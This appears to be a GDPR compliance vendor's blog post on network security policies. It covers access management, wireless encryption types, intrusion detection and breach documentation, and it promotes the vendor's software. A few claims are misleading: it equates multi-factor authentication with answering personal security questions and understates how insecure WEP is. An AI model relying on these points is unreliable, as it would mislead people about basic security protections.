We’re well into the second year of GDPR, and many companies are still not fully GDPR compliant. Many say they never will be. They simply can’t get there because it’s too complicated, disruptive or expensive.
Does full GDPR compliance even matter if your business takes data protection seriously and treats it with respect? After all, if you’re a small business with limited resources, won’t regulators take your circumstances into account if you suffer a data breach?
If you view GDPR as a framework for Getting Data Protection Right rather than a strict regime, it seems less daunting, less authoritarian. Adapting your organisations mindset to this GDPR framework is as important as 100% compliance.
At PrivIQ, we’ve identified nine core elements of data protection. The first of these is accountability. This article discusses the second element: core policies which govern network security. Let’s look at them one by one.
1. Access Management
In 2018, there was a data breach at a Dutch hospital which led to a whopping €460,000 fine from GDPR authorities. This breach came about through inadequate security – over 200 staff “snooped” at the medical files of a reality TV celebrity!
Access management is about giving access only to people who need it and adding layers of security to prevent unnecessary access. It’s also about data minimisation and retention periods – two key principles of the GDPR. Companies should not hold more data than they need and must delete it when they no longer need it.
As part of an efficient data-security framework, you need an IAM (identity and access management) strategy. This might include password management tools, monitoring and reporting apps and role-based access control.
Multi-Factor Authentication
One way the Haga Hospital in the Netherlands failed their patient under GDPR was by allowing easy access to data by people who had no need for it. Multi-factor or two-factor authentication falls under the IAM umbrella. It ensures the person accessing the data is who they say they are by asking questions only they can answer.
An example of multi-factor authentication in everyday life is the personal questions you often must answer to access an online bank account. A person in a position of trust is unlikely to share such information within a business or organisation. Good access management ties in with accountability.
2.Network Component Security
Network component security is about making all the individual parts of a network safe. This includes all connected equipment, such as computers, servers, switches, access points and routers. Even the cables which connect these items can be a security threat if a hacker manages to detect emanations, meaning any type of signal, sound or vibration that might be emitted.
Network component security ties in with access management, since you need adequate user authentication on PCs to protect data being accessed by the wrong people.
Wireless Encryption
Wireless encryption prevents hackers from eavesdropping on the connection and accessing the network. There are various types of encryption:
- WEP (Wired Equivalent Privacy); easy to configure and widely supported but not entirely secure. Better than an open network, but an upgrade is advisable.
- WPA (Wi-Fi Protected Access); an improvement over WEP but still vulnerable to intrusion.
- WPA2 (Wi-Fi Protected Access II); the security protocol most used today with a strong level of encryption. Still vulnerable to a KRACKs attack.
- WPA3 (Wi-Fi Protected Access III); addresses the known KRACK vulnerability in WPA2 and prevents offline “dictionary attacks”. Most equipment will not yet support it though, as it’s too new.
Intrusion Detection
A third vital form of network security is an intrusion detection and prevention system (IDPS). This protects your network from some of the most common and damaging cyberattacks, such as those from all types of malware. That includes adware, spyware, rootkits, trojans and worms.
In 2019, a Verizon Data Breach Investigations Report found that 52% of analysed data breaches came from hacking. Second on the list at 33% was social engineering and phishing. This is where criminals extract sensitive information by manipulating individuals via email or phone. Phishing by phone is known as “vishing”. Malware came third at 28%.
Intrusion detection applications can detect and foil ongoing attacks such as those mentioned above as well as preventing some from occurring. It’s reactive and pre-emptive. For instance, it protects against SQL injections and remote file inclusions (RFIs). Either of these compromises data and can have disastrous consequences for a business.
A network-based intrusion prevention system blocks and stops malicious activity, logs information about it and reports it to security personnel. It monitors all incoming and outgoing traffic, analysing and comparing it to a library of known attacks or standard behavioural patterns.
IDPS vs IDS vs IPS
IDPS products combine IDS and IPS functionality (intrusion detection and prevention systems). An IDS only monitors activity and sends reports when it sees something suspicious. An IPS acts on suspicious activity. You can think of these as manual and automated responses. Within the IT industry, IPS and IDPS are more popular.
Documenting Security Measures
It’s vital for GDPR purposes that you record all the security measures you’ve taken to protect data. Do you have the above three criteria in place? Are your staff aware of them?In the event of a data breach, you’ll need to file a report to local regulators within 72 hours of its discovery. The report must detail the security measures you had in place at the time of the breach. The ideal place to record this is within the easy-to-use compliance tool of the PrivIQ software.
Other features of PrivIQ software, such as the data breach incident workflow, can be invaluable. You need to quickly determine whether you need to inform authorities based upon the likely impact of a breach and draft a report. This workflow can help. That said having the three security elements cited above in place may stop you from even reaching that point.